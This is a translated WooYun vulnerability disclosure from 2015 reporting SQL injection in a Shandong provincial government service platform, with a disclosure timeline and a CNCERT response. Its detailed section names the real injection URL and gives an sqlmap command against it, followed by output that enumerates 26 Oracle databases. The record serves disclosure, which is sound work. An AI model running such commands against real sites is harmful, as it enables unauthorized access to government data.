Vulnerability summary

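Bug ID: wooyun-2015-0105966

Vulnerability title: SQL injection in a Shandong provincial government service platform exposes a large amount of information

Vendor: CNCERT (National Internet Emergency Center)

Vulnerability author: 小天

Submitted: 2015-04-08 11:33

Fixed: 2015-05-25 18:42

Made public: 2015-05-25 18:42

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Vulnerability status: handed over to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling

Vulnerability source: http://www.wooyun.org; for questions or help, contact [email protected]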



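Vulnerability details

Disclosure status:

2015-04-08: Details reported to the vendor, awaiting vendor handling
2015-04-10: Vendor confirmed; details disclosed to the vendor only
2015-04-20: Details disclosed to core white hats and experts in related fields
2015-04-30: Details disclosed to regular white hats
2015-05-10: Details disclosed to intern white hats
2015-05-25: Details disclosed to the public

Brief description:

Unbelievable. A single database turned out to have 216 tables. It took me several hours, so I am not going to dump the data; too tiring.

Detailed description:

Injection point: http://flfw.smesd.gov.cn/clist.jsp?id=331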

sqlmap.py  -u http://flfw.smesd.gov.cn/clist.jsp?id=331  --dbs
available databases [26]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] HR
[*] IX
[*] MDSYS
[*] OE
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] PM
[*] SCOTT
[*] SH
[*] SHUJUTONGBU
[*] SMESDUSER
[*] SOE
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB
Database: SMESDUSER
[213 tables]

Proof of vulnerability:

See title.

Fix:

Filter.

Copyright notice: when reposting, please credit the source: 小天@乌云


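Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 11

Confirmed: 2015-04-10 18:40

Vendor reply:

Forwarded by CNCERT to the relevant sub-center, which will follow up by coordinating with the organization that manages the website to handle it.

Latest status:

None yet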

